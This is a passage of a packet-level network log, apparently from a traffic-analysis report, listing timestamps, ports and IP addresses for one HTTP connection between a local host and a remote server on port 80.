Oct 8, 2024 11:31:13.614193916 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.614197969 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.614228964 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.616055012 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616204023 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616219997 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616235018 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616249084 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616255999 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.616266012 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616276979 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.616281986 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616291046 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.616300106 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616321087 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616327047 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.616343975 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616358995 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616374016 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616389036 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616389036 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.616410017 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.616416931 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616434097 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616437912 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.616450071 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616478920 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.616695881 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616805077 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616827965 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616842985 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616851091 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.616858006 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616873980 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616877079 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.616893053 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616893053 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.616911888 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616928101 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616939068 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.616944075 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.616986990 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.617187977 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.617202997 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.617218971 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.617244005 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.617261887 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.617276907 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.617295980 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.617311954 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.617341042 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.669215918 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.694461107 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694493055 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694519043 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694534063 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694547892 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694557905 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.694562912 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694578886 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694602966 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694626093 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.694626093 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.694628000 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694643974 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694659948 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694663048 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.694674015 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694688082 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.694689989 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694705009 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694720984 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694725990 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.694736958 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694755077 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.694758892 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694776058 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694783926 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.694794893 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694808960 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694817066 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.694823980 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694849968 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.694875002 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694890022 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694905043 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694920063 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.694920063 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.694958925 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.701337099 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701353073 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701370955 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701415062 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.701448917 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.701469898 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701488018 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701503992 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701528072 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701548100 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.701555014 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701570034 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701574087 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.701586962 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701603889 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701618910 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.701621056 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701637030 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701652050 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701658010 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.701668024 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701672077 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.701684952 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701699018 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701715946 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701729059 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.701731920 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701750994 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701756001 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.701765060 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.701771021 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.701811075 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.702521086 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.702538013 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.702553034 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.702575922 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.702583075 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.702594042 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.702611923 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.702626944 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.702641010 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.702644110 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.702671051 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.702689886 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.703418016 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.703442097 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.703455925 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.703471899 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.703486919 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.703502893 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.703510046 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.703517914 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.703535080 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.703543901 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.703587055 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.704346895 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704396009 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704412937 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704461098 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.704581976 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704600096 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704615116 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704629898 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704644918 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.704653978 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704657078 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.704669952 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704689026 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704699039 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.704704046 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704721928 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704735994 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.704736948 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704755068 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.704763889 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.704813004 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705272913 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705300093 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705315113 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705349922 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705377102 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705393076 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705409050 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705430031 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705444098 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705454111 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705466986 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705470085 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705495119 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705503941 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705511093 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705527067 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705543041 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705569983 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705585003 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705595970 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705600977 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705614090 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705624104 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705642939 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705646992 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705672026 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705688000 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705694914 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705734968 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705739021 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705750942 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705775976 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705790997 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705792904 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705810070 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705823898 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705841064 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705854893 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705866098 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705889940 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705914974 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.705935955 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.705965996 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.706111908 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.706448078 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.706471920 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.706486940 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.706515074 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.706516981 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.706530094 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.706564903 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.706579924 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.706609011 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.706623077 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.747354984 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.785324097 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785398006 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785434008 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785468102 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785515070 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785516024 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.785548925 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785567045 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.785586119 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785607100 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.785619974 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785654068 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785686970 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785701990 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.785721064 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785754919 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785769939 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.785790920 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785804033 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.785825968 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785861015 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785877943 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.785895109 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785933018 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.785964966 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.785965919 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.786004066 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.786015987 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.786037922 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.786073923 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.786124945 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.792138100 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792195082 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792253017 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792265892 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.792306900 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792356968 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.792365074 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792411089 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.792416096 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792452097 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792484999 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792512894 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.792519093 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792551994 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792567968 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.792586088 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792618990 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792651892 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792670965 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.792685032 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792696953 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.792721987 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792753935 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792768002 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.792788982 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792829037 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792845964 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.792865038 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792897940 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792929888 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792946100 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.792963028 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.792968988 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.792999029 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793031931 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793045044 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.793066025 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793100119 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793112993 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.793135881 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793164015 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793211937 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793230057 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793262959 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793270111 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.793298006 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793314934 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.793333054 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793366909 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793399096 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793415070 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.793435097 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.793482065 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.795001984 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795032024 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795058012 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.795068026 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795116901 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.795120955 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795156002 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795186996 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795200109 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.795291901 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795325994 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795339108 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.795360088 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795424938 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795454979 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795478106 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.795500040 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.795506001 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795542002 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795574903 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795609951 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795643091 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795646906 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.795666933 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.795681000 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795717001 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795730114 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.795751095 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.795784950 CEST	80	49993	63.250.38.167	192.168.2.6
